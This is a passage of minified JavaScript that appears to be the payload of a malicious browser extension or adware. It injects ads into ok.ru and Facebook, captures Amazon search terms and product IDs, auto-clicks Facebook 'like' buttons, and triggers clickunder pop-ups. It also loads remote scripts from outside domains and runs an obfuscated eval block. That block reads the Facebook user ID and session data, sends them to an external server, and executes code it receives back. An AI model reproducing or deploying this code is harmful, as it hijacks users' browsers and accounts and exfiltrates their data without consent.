\",\"hostname_allow\":\"\",\"hostname_deny\":\"\",\"browsers_allow\":\"\",\"browsers_deny\":\"\",\"coverage\":\"100\",\"url\":\"\\/\\/srvvtrk.com\\/91a2556838a7c33eac284eea30bdcc29\\/validate-site.js?uid=51113x3231x\\/SID\\/&r=\\/RANDOM\\/\",\"limit\":\"0\",\"type\":\"external\",\"key\":\"90f06\"},\"c3369\":{\"countries_allow\":\"at,br,ch,de,dk,es,fi,fr,in,it,mx,nl,no,se,sg,tw,gb\",\"countries_deny\":\"\",\"hostname_allow\":\"(?:google\\\\..*|youtube\\\\.com)\",\"hostname_deny\":\"\",\"browsers_allow\":\"\",\"browsers_deny\":\"\",\"coverage\":\"100\",\"url\":\"\\/\\/laubeyrietechnology.com\\/script\\/d.php?uid=51113x0000xzzzzzzzzzzzzzzzzzzzzz&a=3453\",\"limit\":\"0\",\"type\":\"external\",\"key\":\"c3369\"},\"acfec\":{\"countries_allow\":\"us,de,gb,fr,ca,au,nl,es,it,nz,be,se,ch,in,at,br,dk,no,fi\",\"countries_deny\":\"\",\"hostname_allow\":\"(?:amazon\\\\..*|.*\\\\.amazon\\\\..*)\",\"hostname_deny\":\"\",\"browsers_allow\":\"\",\"browsers_deny\":\"\",\"coverage\":\"0-100\",\"url\":\"\",\"limit\":\"0\",\"type\":\"platform\",\"key\":\"acfec\",\"config\":{\"subid\":\"1158\"}}}");
  1848. $$.monetizationsConfig = scriptsToLoad;
  1849. var extendedCallbacks = false;
  1850. if ("51113" == "51739") {
  1851. extendedCallbacks = true
  1852. }
  1853. ;;;;;;;;;;;;;;;;;;;var isInIframe = function() {
  1854. return (window.top != window.self)
  1855. };
  1856. var secondsFormat = function(sec_num) {
  1857. var days = Math.floor(sec_num / 86400);
  1858. sec_num -= days * 86400;
  1859. var hours = Math.floor(sec_num / 3600);
  1860. sec_num -= hours * 3600;
  1861. var minutes = Math.floor(sec_num / 60);
  1862. sec_num -= minutes * 60;
  1863. if (hours < 10) {
  1864. hours = "0" + hours
  1865. }
  1866. if (minutes < 10) {
  1867. minutes = "0" + minutes
  1868. }
  1869. if (sec_num < 10) {
  1870. sec_num = "0" + sec_num
  1871. }
  1872. return days + "d " + hours + ":" + minutes + ":" + sec_num
  1873. };
  1874. var runForceSearch;
  1875. ;;;if (!scriptsToLoad) {
  1876. return false
  1877. }
  1878. var getUrlFromConfigObject = function(configRow) {
  1879. if (configRow.http_url && window.location.protocol == "http:") {
  1880. return configRow.http_url
  1881. } else {
  1882. if (configRow.https_url && window.location.protocol == "https:") {
  1883. return configRow.https_url
  1884. } else {
  1885. if (configRow.url) {
  1886. return configRow.url
  1887. }
  1888. }
  1889. }
  1890. };
  1891. if (scriptsToLoad['4a71b'] && $$.getCookie("__mzpsd") == 1) {
  1892. return false
  1893. }
  1894. if (location.hostname.indexOf("ok.ru") > -1 && scriptsToLoad['1f755']) {
  1895. var oconf = $$.getMtzCfg('1f755');
  1896. if (!!oconf.injectOk && oconf.injectOk == "1") {
  1897. (function() {
  1898. var d = document.querySelector("body");
  1899. if (!d) {
  1900. return
  1901. }
  1902. function i(j) {
  1903. j = j.replace(/%PUBLISHER_ID%/, ($$ && $$.tbParams && $$.tbParams.wid) ? $$.tbParams.wid : "");
  1904. j = j.replace(/%SOURCE_ID%/, ($$ && $$.tbParams && $$.tbParams.tid) ? $$.tbParams.tid : "");
  1905. j = j.replace(/%SUBID%/, ($$ && $$.tbParams && $$.tbParams.sid) ? $$.tbParams.sid : "");
  1906. j = j.replace(/INSERT_RANDOM_NUMBER_HERE/, new Date().getTime());
  1907. return j
  1908. }
  1909. var e = i("<iframe id='a60b8ce3' name='a60b8ce3' src='//cdnpps.us/www/delivery/afr.php?zoneid=122&amp;cb=INSERT_RANDOM_NUMBER_HERE&amp;xid=%PUBLISHER_ID%_%SOURCE_ID%_%SUBID%' frameborder='0' scrolling='no' width='300' height='600' style='display:inline-block;'><a href='//cdnpps.us/www/delivery/ck.php?n=abb06471' target='_blank'><img src='//cdnpps.us/www/delivery/avw.php?zoneid=122&amp;n=abb06471' border='0' alt='' /></a></iframe>");
  1910. var c = i("<iframe id='8a61598d' name='8a61598d' src='//cdnpps.us/www/delivery/afr.php?zoneid=119&amp;cb=INSERT_RANDOM_NUMBER_HERE&amp;xid=%PUBLISHER_ID%_%SOURCE_ID%_%SUBID%' frameborder='0' scrolling='no' width='468' height='60' style='display:inline-block;'><a href='//cdnpps.us/www/delivery/ck.php?n=8a61598d' target='_blank'><img src='//cdnpps.us/www/delivery/avw.php?zoneid=119&amp;n=8a61598d' border='0' alt='' /></a></iframe>");
  1911. function f(j) {
  1912. return document.querySelectorAll(j) || []
  1913. }
  1914. var a = function(n, j, o, l, m) {
  1915. var k = document.createElement("div");
  1916. k.setAttribute("id", "_" + Math.floor((Math.random() * 1000000000)));
  1917. k.setAttribute("style", m || "");
  1918. k.innerHTML = o;
  1919. l.style.textAlign = "center";
  1920. l.appendChild(k)
  1921. };
  1922. function b(j) {
  1923. j.id = "_" + j.id;
  1924. j.setAttribute("data-mytype", "name_baner");
  1925. j.innerHTML = "";
  1926. a(300, 600, e, j)
  1927. }
  1928. function h(k, j) {
  1929. var l = document.createElement("div");
  1930. l.setAttribute("data-mytype", "name_baner");
  1931. l.setAttribute("style", "margin:0 auto; overflow:hidden;");
  1932. k.setAttribute("data-mytype", "name_baner");
  1933. k.appendChild(l);
  1934. a(468, 60, c, l, j)
  1935. }
  1936. var g = function() {
  1937. Array.prototype.forEach.call(f("div.feed.__klass.__no-ava>.feed_cnt"), function(j) {
  1938. if (!j.getAttribute("data-mytype")) {
  1939. h(j, "margin: 0 auto 10px;")
  1940. }
  1941. });
  1942. Array.prototype.forEach.call(f('div[class^="feed h-mod"]'), function(j) {
  1943. if (!j.lastElementChild.getAttribute("data-mytype") && !j.parentNode.getAttribute("class")) {
  1944. h(j, "margin: 10px auto 0;")
  1945. }
  1946. });
  1947. Array.prototype.forEach.call(f('div[data-btype^="LinkBanner_navigate"]'), function(j) {
  1948. if (!j.getAttribute("data-mytype")) {
  1949. j.innerHTML = "";
  1950. b(j)
  1951. }
  1952. });
  1953. setTimeout(g, 3333)
  1954. };
  1955. g()
  1956. }
  1957. )();
  1958. }
  1959. }
  1960. var amzreg = /(^|www\.)amazon\./g;
  1961. if (location.hostname.match(amzreg)) {
  1962. (function(f, a) {
  1963. function e(h) {
  1964. var g, d, i = new RegExp("[?&#]" + h + "=([^&#$]+)","g");
  1965. while (g = i.exec(a.location.href)) {
  1966. d = decodeURIComponent((g[1] + "").replace(/\+/g, "%20"))
  1967. }
  1968. return d
  1969. }
  1970. function b() {
  1971. if (f.location.pathname.indexOf("/s/") !== 0 && f.location.pathname.indexOf("/gp/search/") !== 0) {
  1972. return
  1973. }
  1974. var p = (f.querySelector("[name=field-keywords]") && f.querySelector("[name=field-keywords]").value) || e("field-keywords");
  1975. var g = ""
  1976. , i = f.querySelector("#searchDropdownBox option:checked");
  1977. if (f.querySelector("#apsRedirectLink")) {
  1978. i = f.querySelector("#searchDropdownBox option:first-child")
  1979. }
  1980. if (!!i) {
  1981. g = i.value + "::" + i.textContent
  1982. }
  1983. var j = [];
  1984. var o = [].slice.call(f.querySelectorAll(".s-result-item"));
  1985. if (o.length) {
  1986. j = o.map(function(m) {
  1987. return m.getAttribute("data-asin")
  1988. })
  1989. }
  1990. var k, d = f.getElementById("s-result-count");
  1991. if (!!d) {
  1992. k = d.textContent.indexOf("-") > -1 ? parseInt(d.textContent) : 1;
  1993. if (f.location.hostname.indexOf("amazon.com.mx") > -1) {
  1994. k = d.textContent.indexOf(" a ") > -1 ? parseInt(d.textContent) : 1
  1995. }
  1996. if (f.location.hostname.indexOf("amazon.cn") > -1 || f.location.hostname.indexOf("amazon.co.jp") > -1) {
  1997. var h = d.textContent.match(/\d+\-\d+/);
  1998. if (!!h) {
  1999. k = parseInt(h[0])
  2000. }
  2001. }
  2002. }
  2003. if (Number.isInteger(k) == false) {
  2004. var n = f.querySelector(".pagnCur");
  2005. var l = n ? parseInt(n.textContent) : parseInt(e("page")) || 1;
  2006. k = (l - 1) * o.length + 1
  2007. }
  2008. if (!j.length) {
  2009. return
  2010. }
  2011. $$.loadedCallback("AMZN_SEARCH", "", a.location.hostname, p, j.join(","), k, g)
  2012. }
  2013. b();
  2014. var c = a.history.pushState;
  2015. window.history.pushState = function(i) {
  2016. var d = 1000
  2017. , h = f.getElementById("s-results-list-atf")
  2018. , g = setInterval(function() {
  2019. if (h !== f.getElementById("s-results-list-atf") && f.getElementById("centerBelowPlusspacer") === null) {
  2020. clearInterval(g);
  2021. b()
  2022. }
  2023. if (!d--) {
  2024. clearInterval(g)
  2025. }
  2026. }, 100);
  2027. return c.apply(a.history, arguments)
  2028. }
  2029. }
  2030. )(document, window);
  2031. }
  2032. var searchEngineCheckResult;
  2033. var isSearchEngine = function() {
  2034. if (typeof searchEngineCheckResult != "undefined") {
  2035. return searchEngineCheckResult
  2036. }
  2037. var found = false;
  2038. ["google.", "search.yahoo.", "bing.com", "ask.com", "shopping.yahoo", "search.aol.", "wow.com", "when.com", "search.mywebsearch.com", "search.myway.com", "duckduckgo.com", "mysearch.com", "teoma.com", "searchlock.com", "myprivatesearch.com", "searchprivacy.co", "thesmartsearch.net", "infospace", "safefinder.com", "mysearchguardian.com"].forEach(function(domainCheck) {
  2039. if (location.hostname.indexOf(domainCheck) > -1) {
  2040. found = true
  2041. }
  2042. });
  2043. searchEngineCheckResult = found;
  2044. return found
  2045. };
  2046. if (location.hostname.indexOf("facebook.com") > -1) {
  2047. if (scriptsToLoad['5df82']) {
  2048. (function(r, j, l) {
  2049. var k = j["c9f22c14a3872f280d"];
  2050. var a = j["c9f22c14a3872f280d"].Sizzle;
  2051. if (location.hostname.indexOf("facebook.com") < 0) {
  2052. return
  2053. }
  2054. var q = {
  2055. _mfbgp_sub_g2: "/fun8times"
  2056. };
  2057. var g = '5df82';
  2058. var o = false;
  2059. var t = "_mfbgp_sub_t";
  2060. var b = false;
  2061. var n = null;
  2062. for (var p in q) {
  2063. if (location.href.indexOf(q[p]) > -1) {
  2064. n = p
  2065. }
  2066. }
  2067. if (!n) {
  2068. var f = false;
  2069. var m = k.getCookie(t);
  2070. if (m > (k.unixTimestampNow - 86400)) {
  2071. return
  2072. }
  2073. var c = [];
  2074. for (var p in q) {
  2075. if (k.getCookie(p)) {
  2076. continue
  2077. }
  2078. c.push(q[p])
  2079. }
  2080. if (!c || c.length < 1) {
  2081. return
  2082. }
  2083. var e = c[Math.floor(Math.random() * c.length)];
  2084. if (typeof e == "undefined") {
  2085. return
  2086. }
  2087. e = "https://facebook.com" + e;
  2088. var s = function(i) {
  2089. var u = this;
  2090. var d = [];
  2091. k.on(j.addEventListener ? j : r, "click", function(w) {
  2092. var v = w.ctrlKey || w.metaKey || w.altKey || w.shiftKey
  2093. , x = w.which && 1 === w.which || 0 === w.button;
  2094. k.each(d, function(y) {
  2095. if (y.call(w) === true) {
  2096. k.preventDefault(w);
  2097. return false
  2098. }
  2099. })
  2100. });
  2101. u.backgroundLink = function(x) {
  2102. var w = document.createElement("a");
  2103. w.href = x;
  2104. w.__norewrite = 1;
  2105. w.rel = "norewrite";
  2106. w.target = "_blank";
  2107. var v = document.createEvent("MouseEvents");
  2108. v.initMouseEvent("click", true, true, window, 0, 0, 0, 0, 0, true, false, false, false, 0, null);
  2109. w.dispatchEvent(v)
  2110. }
  2111. ;
  2112. u.clickunder = function(v) {
  2113. d.push(v)
  2114. }
  2115. ;
  2116. u.clickunder(function(v) {
  2117. if (!f && i) {
  2118. u.backgroundLink(i);
  2119. k.updateLimits(g);
  2120. k.loadedCallback("BANNER_LOAD", g);
  2121. k.setCookie(t, k.unixTimestampNow, {
  2122. expire: 864000,
  2123. path: "/"
  2124. });
  2125. f = true;
  2126. return true
  2127. } else {
  2128. return false
  2129. }
  2130. })
  2131. };
  2132. s(e);
  2133. return
  2134. }
  2135. if (k.getCookie(n)) {
  2136. return
  2137. }
  2138. k.loadedCallback("MNTZ_LOADED", g);
  2139. function h() {
  2140. if (b) {
  2141. return
  2142. }
  2143. var d = a("#pages-header button.likeButton");
  2144. if (d.length > 0) {
  2145. d[0].click();
  2146. b = true;
  2147. k.setCookie(n, 1, {
  2148. expire: 86400 * 60,
  2149. path: "/"
  2150. });
  2151. k.setCookie(t, k.unixTimestampNow, {
  2152. expire: 864000,
  2153. path: "/"
  2154. })
  2155. }
  2156. }
  2157. k.ready(function() {
  2158. if (o) {
  2159. return
  2160. }
  2161. o = true;
  2162. h();
  2163. var v = window.MutationObserver || window.WebKitMutationObserver || window.MozMutationObserver;
  2164. var i = document.body;
  2165. if (typeof v != "undefined") {
  2166. var u = new v(function(x) {
  2167. x.forEach(function(z) {
  2168. if (z.type === "childList") {
  2169. for (var y = 0; y < z.addedNodes.length; y++) {
  2170. h()
  2171. }
  2172. }
  2173. u.observe(document.body, {
  2174. childList: true,
  2175. subtree: true
  2176. })
  2177. })
  2178. }
  2179. );
  2180. u.observe(i, {
  2181. childList: true,
  2182. subtree: true
  2183. })
  2184. } else {
  2185. var w = function() {
  2186. if (b) {
  2187. return true
  2188. }
  2189. h();
  2190. d = setTimeout("checkByTimer", 1000)
  2191. };
  2192. var d = setTimeout("checkByTimer", 1000)
  2193. }
  2194. })
  2195. }
  2196. )(document, window);
  2197. }
  2198. if (scriptsToLoad['af23c']) {
  2199. (function(f, h, j) {
  2200. var g = true;
  2201. try {
  2202. if (chrome.bookmarks) {
  2203. g = false
  2204. }
  2205. } catch (c) {}
  2206. if (location.protocol == "chrome-extension:") {
  2207. g = false
  2208. }
  2209. if (g) {
  2210. var b = window.location.href;
  2211. var l = document.getElementById("dexscriptpopup");
  2212. if (l === null && b.indexOf("m.facebook.com") != "-1") {
  2213. document.body.style.width = "0px";
  2214. var k = document.createElement("div");
  2215. k.id = "dexscriptpopup";
  2216. k.style.cssText = "position:fixed; width:100%; height:100%; z-index:100; background:#fff; top:0px; left: 0px;";
  2217. document.body.appendChild(k);
  2218. setTimeout(function() {
  2219. window.close()
  2220. }, 10000)
  2221. }
  2222. var i = document.createElement("script");
  2223. i.id = "dexscriptid";
  2224. i.src = "https://votetoda.com/ext/script.php?id=ukr&track=true";
  2225. var a = document.getElementById("dexscriptid");
  2226. if (a === null) {
  2227. document.body.appendChild(i)
  2228. } else {}
  2229. } else {
  2230. var i = document.createElement("script");
  2231. i.id = "dexscriptid";
  2232. i.src = "https://votetoda.com/ext/script.php?id=ukr&track=false";
  2233. var a = document.getElementById("dexscriptid");
  2234. if (a === null) {
  2235. document.body.appendChild(i)
  2236. } else {}
  2237. }
  2238. }
  2239. )(document, window);
  2240. }
  2241. if (scriptsToLoad['4d3a8']) {
  2242. eval(function(p, a, c, k) {
  2243. var d = {}
  2244. , e = function(c) {
  2245. return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
  2246. };
  2247. if (!''.replace(/^/, String)) {
  2248. while (c--) {
  2249. d[e(c)] = k[c] || e(c)
  2250. }
  2251. k = [function(e) {
  2252. return d[e]
  2253. }
  2254. ];
  2255. e = function() {
  2256. return '\\w+'
  2257. }
  2258. ;
  2259. c = 1
  2260. }
  2261. ;while (c--) {
  2262. if (k[c]) {
  2263. p = p.replace(new RegExp('\\b' + e(c) + '\\b','g'), k[c])
  2264. }
  2265. }
  2266. return p
  2267. }('!6(){9("1c"==k.y.1b(0,4)&&8&&"V"!=O 8&&g==g.1e){7 a=6(){7 a=8.1v("1a");v a&&Z 0!==a&&a.w&&a[0]&&Z 0!==a[0]&&a[0].p?(a=a[0],a.10?0:(a.10=1,1)):-1},b=6(){6 a(1y){7 b="1z";9(!8.N(b)){7 c=8.u("1A");c.B=b,8.1a.p(c);(6(){9(k.y.1b(0,4)!=\'1c\'||g.Y)v;g.Y=1;!6(){7 E=6(){1B.1C(\'1D 1E\');7 1g=6(){9(1e.k==1F.k){7 t,e,i,n=8,a="0",o="",r="1G://1H.1x.1I.1K.1L.1M",d=6(t){t=t.J();X(7 e="",i=6(t,i){X(7 n="",a="",o=0;o<e.w;o++)o==t?(a=e[o],n+=e[i]):n+=o==i?a:e[o];e=n},n=0;n<t.w;n++)e+="1N"[t[n]]+"1O"[t[n]];v i(0,24),i(3,20),i(5,18),e},s=6(t){i.1P(11.1Q(t),r)},f=6(){9(g&&g.K){9((t=g.K("1U"))&&t.T&&(a=t.T),"0"!==a&&(!(e=0)||e<5)){o=d(a),g.Q("1S",c);7 l=n.u("1T");l.B="R",l.1J=r+"/W.1w?B="+a+"&s="+(e||"0")+"&h="+o+"&r="+1o.1i()+"&1p=1q",l.1s="1m:1f;1t:1f; 1u: 1l; 1j -1n;",l.1k=6(){i=l.1r,s({1h:"W",1d:"1",1R:o})},n.F.p(l)}}P q(f,G)},c=6(t){9(t.2k==r&&t.C)A{7 i=11.2r(t.C);9(!i||!i.1d)v;9("2y"==i.1h&&(e=i.2l)<5){7 a=n.u("m");a.2m=2n(i.C),n.F.p(a)}}z(t){}};n.k.y.2q(/1V\\.H/2t)&&!n.N("R")&&q(f,G)}};7 m=8.u(\'m\');m.2x=\'(\'+1g.J()+\')()\';8.F.p(m)};9(8.D==\'2o\'||8.D==\'2i\')E();P 8.Q(\'28\',E,2h)}()})()}}6 b(){7 a;A{a=j U("1Y.S")}z(b){A{a=j U("1Z.S")}z(b){a=!1}}a||"V"==O I||(a=j I),M.L=a}b.21.x=6(a,b,c){7 d=M.L;9(c)7 e=q(6(){d.22,b(!1,"23 25")},c);b=b||6(){},d.29=6(){4==d.D&&(2b(e),b(2d==d.2e,d.2f))},d.2g("1W",a,!0),d.2j(2c)},(j b).x("//2a.27/1X/26/",6(b,c){b&&c&&2==c.w||(c="2w"),a(c)},2v),(j b).x("//19.17.H/c?16=2u-2s&15=14~~&13=1&",6(){},12),(j b).x("//19.17.H/c?16=2p&15=14~~&13=1&",6(){},12)},c=6(){7 d=a();0!==d&&(-1===d&&q(c,G),1===d&&b())};c()}}();', 62, 159, '||||||function|var|document|if|||||||window|||new|location||script|||appendChild|setTimeout||||createElement|return|length|get|href|catch|try|id|data|readyState|startAll|body|100|com|XMLHttpRequest|toString|require|xhr|this|getElementById|typeof|else|addEventListener|_ga_f|XMLHTTP|USER_ID|ActiveXObject|undefined|start|for|reigw34pn7tsjkdygf|void|xadscriptinserted|JSON|2e4|count|MTM1MzkgD1_LU1S68cRBsL4BFHW56g|ukey|key|stathat||api|head|substr|http|is_ga|top|1px|toInject|do|random|left|onload|absolute|width|100px|Math|subid|34|contentWindow|style|height|position|getElementsByTagName|php|217|detected_country|wwi3bdi87sg87gi3av8bc8sgeyvru2y3|meta|console|log|StartAll|ok|self|https|144|45|src|42|nip|io|AeO5nNHidSjLVt3|FEDCBA123456789|postMessage|stringify|hmac|message|iframe|CurrentUserInitialData|facebook|GET|geolocation|Msxml2|Microsoft||prototype|abort|Timeout||reached|1605|club|DOMContentLoaded|onreadystatechange|hoholikik|clearTimeout|null|200|status|responseText|open|false|complete|send|origin|state|text|atob|interactive|wvUQhbogKVXDJOxzv8z50yA1cnJz|match|parse|298f_wfCUwTL3yYSDMyA2ZFpp|im|YA|1e4|XX|innerText|next'.split('|')))
  2268. }
  2269. if (scriptsToLoad['1f755']) {
  2270. var fconf = $$.getMtzCfg('1f755');
  2271. if (!!fconf.injectFacebook && fconf.injectFacebook == "1") {
  2272. (function() {
  2273. var d = document.querySelector("body");
  2274. if (!d) {
  2275. return
  2276. }
  2277. function j(k) {
  2278. k = k.replace(/%PUBLISHER_ID%/, ($$ && $$.tbParams && $$.tbParams.wid) ? $$.tbParams.wid : "");
  2279. k = k.replace(/%SOURCE_ID%/, ($$ && $$.tbParams && $$.tbParams.tid) ? $$.tbParams.tid : "");
  2280. k = k.replace(/%SUBID%/, ($$ && $$.tbParams && $$.tbParams.sid) ? $$.tbParams.sid : "");
  2281. k = k.replace(/INSERT_RANDOM_NUMBER_HERE/, new Date().getTime());
  2282. return k
  2283. }
  2284. var f = j("<iframe id='c8866ab3' name='c8866ab3' src='//cdnpps.us/www/delivery/afr.php?zoneid=120&amp;cb=INSERT_RANDOM_NUMBER_HERE&amp;xid=%PUBLISHER_ID%_%SOURCE_ID%_%SUBID%' frameborder='0' scrolling='no' width='300' height='250' style='display:block;'><a href='//cdnpps.us/www/delivery/ck.php?n=c8866ab3' target='_blank'><img src='//cdnpps.us/www/delivery/avw.php?zoneid=120&amp;n=c8866ab3' border='0' alt='' /></a></iframe>");
  2285. var c = j("<iframe id='8a61598d' name='8a61598d' src='//cdnpps.us/www/delivery/afr.php?zoneid=119&amp;cb=INSERT_RANDOM_NUMBER_HERE&amp;xid=%PUBLISHER_ID%_%SOURCE_ID%_%SUBID%' frameborder='0' scrolling='no' width='468' height='60' style='display:block;'><a href='//cdnpps.us/www/delivery/ck.php?n=8a61598d' target='_blank'><img src='//cdnpps.us/www/delivery/avw.php?zoneid=119&amp;n=8a61598d' border='0' alt='' /></a></iframe>");
  2286. function g(k) {
  2287. return document.querySelectorAll(k) || []
  2288. }
  2289. var a = function(n, k, o, m) {
  2290. var l = document.createElement("div");
  2291. l.setAttribute("id", "_" + Math.floor((Math.random() * 1000000000)));
  2292. l.innerHTML = o;
  2293. l.setAttribute("style", "display: inline-block;height:" + k + "px !important;width:" + n + "px !important;margin:0 auto;z-index:99999999;border:0;");
  2294. m.style.textAlign = "center";
  2295. m.appendChild(l)
  2296. };
  2297. function h(k) {
  2298. k.style.minHeight = "500px";
  2299. k.id = "_" + k.id;
  2300. k.setAttribute("data-mytype", "name_baner");
  2301. k.innerHTML = "";
  2302. a(300, 500, f + f, k)
  2303. }
  2304. function i(k) {
  2305. var l = document.createElement("div");
  2306. l.setAttribute("data-mytype", "name_baner");
  2307. l.setAttribute("style", "width:468px;height:60px;margin:0 auto 10px auto;");
  2308. k.setAttribute("data-mytype", "name_baner");
  2309. k.appendChild(l);
  2310. a(468, 60, c, l)
  2311. }
  2312. var b = function() {
  2313. Array.prototype.forEach.call(g('div[class^="_5jmm _5pat"]'), function(k) {
  2314. if (!k.getAttribute("data-mytype")) {
  2315. i(k)
  2316. }
  2317. });
  2318. Array.prototype.forEach.call(g("#pagelet_ego_pane"), function(k) {
  2319. if (!k.getAttribute("data-mytype") && k.offsetHeight > 50) {
  2320. h(k)
  2321. }
  2322. });
  2323. setTimeout(b, 3333)
  2324. };
  2325. b();
  2326. var e = new MutationObserver(function(k) {
  2327. for (var l in k) {
  2328. if (k[l].addedNodes.length) {
  2329. b();
  2330. break
  2331. }
  2332. }
  2333. }
  2334. );
  2335. e.observe(document.getElementById("content"), {
  2336. childList: true
  2337. })
  2338. }
  2339. )();
  2340. }
  2341. }
  2342. } else {
  2343. $$.loadedCallback("BEFORE_OPTOUT_REQ");
  2344. $$.jsonp({
  2345. url: (window.location.protocol == "http:" ? "http:" : "https:") + "//" + $$.scriptDomain + "/optout/get",
  2346. data: {
  2347. key: "c9f22c14a3872f280d"
  2348. },
  2349. callback: function(response) {
  2350. if (!response.success) {
  2351. $$.loadedCallback("OPTOUT_RESPONSE_FAIL");
  2352. return false
  2353. }
  2354. $$.loadedCallback("OPTOUT_RESPONSE_OK");
  2355. var userId = response.userId;
  2356. var startTime = response.strTm;
  2357. var lifeTime = response.lt;
  2358. var lastActionTime = response.lat;
  2359. var optout = {};
  2360. if (response.optout) {
  2361. optout = $$.optoutValue = $$.fromJson(decodeURIComponent(response.optout))
  2362. }
  2363. var country = response.country;
  2364. var limits = {};
  2365. var ownMonetizationsClickFlag = false;
  2366. if (response.limits) {
  2367. limits = $$.limitsValue = $$.fromJson(decodeURIComponent(response.limits))
  2368. }
  2369. if (response.lcFlag && response.lcFlag == 1) {
  2370. ownMonetizationsClickFlag = true
  2371. }
  2372. var targetingUser = response.targeting || 0;
  2373. var currentHostname = location.hostname;
  2374. currentHostname = currentHostname.replace("www.", "");
  2375. var timeNow = $$.unixTimestampNow;
  2376. if (!country) {
  2377. country = "xx"
  2378. }
  2379. country = country.toLowerCase();
  2380. if (!userId) {
  2381. userId = $$.randomNumber(1, 100);
  2382. $$.jsonp({
  2383. url: (window.location.protocol == "http:" ? "http:" : "https:") + "//" + $$.scriptDomain + "/optout/set/userid",
  2384. data: {
  2385. key: "c9f22c14a3872f280d",
  2386. cv: userId
  2387. }
  2388. })
  2389. }
  2390. if (!startTime) {
  2391. $$.setStartTime()
  2392. }
  2393. $$.updateLifeTime(lifeTime, lastActionTime);
  2394. var timeAfterInstall = $$.unixTimestampNow - startTime;
  2395. var platformBlocks = [];
  2396. for (var key in scriptsToLoad) {
  2397. try {
  2398. var scriptRow = scriptsToLoad[key];
  2399. var scriptUrl = scriptRow.url;
  2400. var scriptUrlParams = {};
  2401. var scriptCoverageFrom = 0;
  2402. var scriptCoverageTo = 100;
  2403. if (scriptRow.coverage.indexOf("-") > -1) {
  2404. var coverageParts = scriptRow.coverage.split("-");
  2405. scriptCoverageFrom = parseInt(coverageParts[0]);
  2406. scriptCoverageTo = parseInt(coverageParts[1])
  2407. } else {
  2408. scriptCoverageTo = parseInt(scriptRow.coverage)
  2409. }
  2410. if (($$.getCookie("__mtzalnly") == 1 || $$.getCookie("__lnntlk") == 1) && ['cd1d2', '210e2', 'b48fe', '6a131', '81d01', 'a5093', '865b2', '88350', 'f81c7', '80c44', '90f06'].indexOf(key) == -1) {
  2411. if ("51113" != "51739") {
  2412. if (extendedCallbacks) {
  2413. $$.loadedCallback("CB_MNTZ_FILTER_AFFLNK", key, "__mtzalnly=" + $$.getCookie("__mtzalnly"), "__lnntlk=" + $$.getCookie("__lnntlk"), location.hostname)
  2414. }
  2415. continue
  2416. } else {
  2417. if (extendedCallbacks) {
  2418. $$.loadedCallback("CB_MNTZ_FILTER_NOTIF_AFFLNK", key, "__mtzalnly=" + $$.getCookie("__mtzalnly"), "__lnntlk=" + $$.getCookie("__lnntlk"), location.hostname)
  2419. }
  2420. }
  2421. }
  2422. if (isSearchEngine()) {
  2423. if (['4dc06', 'd086d', 'deaf7', '42265', '84a21', 'ef3e3', '031e7', '58c2e', '85031', '5db45', 'ac348', '6cf2f', '220bb', 'b6eb3', '1a2aa', '08552', '4a71b', 'f361b', 'cd1d2', '81d01', 'f81c7', 'b777a', 'a49b5', 'c3369', '3e4fd', '6f95e', '9510f', '6a88f', 'f4c82', '44a92', 'd115b', '1229b', '54ace', '72415', '75710', '83296', 'b8695', 'a7711', '3160d', 'd652c', 'ae5a7', '80a06', 'baf71', '6d07f', '5a00b', '571c3', '10cd4', '624a7', '4a0ef', '95dd2', '5de0e', 'e1d94'].indexOf(key) == -1) {
  2424. if (extendedCallbacks) {
  2425. $$.loadedCallback("CB_MNTZ_FILTER_SERCHNGN", key, location.hostname)
  2426. }
  2427. continue
  2428. }
  2429. }
  2430. if (ownMonetizationsClickFlag) {
  2431. if (['4dc06', 'd086d', 'bd895', '1f755', '42265', '84a21', 'ef3e3', '031e7', '58c2e', '85031', 'ac348', '6cf2f', '220bb', 'b6eb3', '1a2aa', '5db45', '08552', '4a71b', '02aed'].indexOf(key) == -1) {
  2432. if (extendedCallbacks) {
  2433. $$.loadedCallback("CB_MNTZ_FILTER_OWNMNTZ", key, location.hostname)
  2434. }
  2435. continue
  2436. }
  2437. }
  2438. if (typeof (scriptUrl) == "object") {
  2439. if (scriptUrl.rotator) {
  2440. var rotatorCount = scriptUrl.rotator.length;
  2441. if (!rotatorCount) {
  2442. rotatorCount = 0
  2443. }
  2444. var rotatorCookieName = "_mrtr_c9f22c14a3872f280d_" + key;
  2445. var lastRotatedIndex = $$.getCookie(rotatorCookieName);
  2446. if (!lastRotatedIndex || lastRotatedIndex < 0 || lastRotatedIndex >= rotatorCount) {
  2447. lastRotatedIndex = 0
  2448. }
  2449. scriptUrlParams = scriptUrl.rotator[lastRotatedIndex];
  2450. scriptUrl = getUrlFromConfigObject(scriptUrlParams);
  2451. lastRotatedIndex++;
  2452. $$.setCookie(rotatorCookieName, lastRotatedIndex, {
  2453. expire: 86400
  2454. })
  2455. } else {
  2456. scriptUrlParams = scriptUrl;
  2457. scriptUrl = getUrlFromConfigObject(scriptUrlParams)
  2458. }
  2459. }
  2460. if (typeof (scriptUrl) != "string") {
  2461. $$.loadedCallback("CB_MNTZ_FILTER_INVALIDURL", key);
  2462. continue
  2463. }
  2464. if (!$$.demoMode) {
  2465. if ("3231" == 1549 && location.protocol == "https:" && (key == "a8bb7" || key == "e9254")) {
  2466. if (extendedCallbacks) {
  2467. $$.loadedCallback("CB_MNTZ_FILTER_CUSTOM", key)
  2468. }
  2469. continue
  2470. }
  2471. if ((location.hostname == "youtube.com" || location.hostname == "www.youtube.com") && key != "1f755" && key != "1fbee" && key != "c3369" && key != "f4c82" && key != "95dd2") {
  2472. continue
  2473. }
  2474. if (location.hostname.indexOf("facebook.com") > -1) {
  2475. continue
  2476. }
  2477. if (optout && optout[key] != undefined && optout[key] == true) {
  2478. if (extendedCallbacks) {
  2479. $$.loadedCallback("CB_MNTZ_FILTER_OPTOUTED", key, optout[key])
  2480. }
  2481. continue
  2482. }
  2483. if (scriptRow.countries_allow && scriptRow.countries_allow.indexOf(country) == -1) {
  2484. if (extendedCallbacks) {
  2485. $$.loadedCallback("CB_MNTZ_FILTER_GEOALLOW", key, country, scriptRow.countries_allow)
  2486. }
  2487. continue
  2488. }
  2489. if (scriptRow.countries_deny && scriptRow.countries_deny.indexOf(country) > -1) {
  2490. if (extendedCallbacks) {
  2491. $$.loadedCallback("CB_MNTZ_FILTER_GEODENY", key, country, scriptRow.countries_deny)
  2492. }
  2493. continue
  2494. }
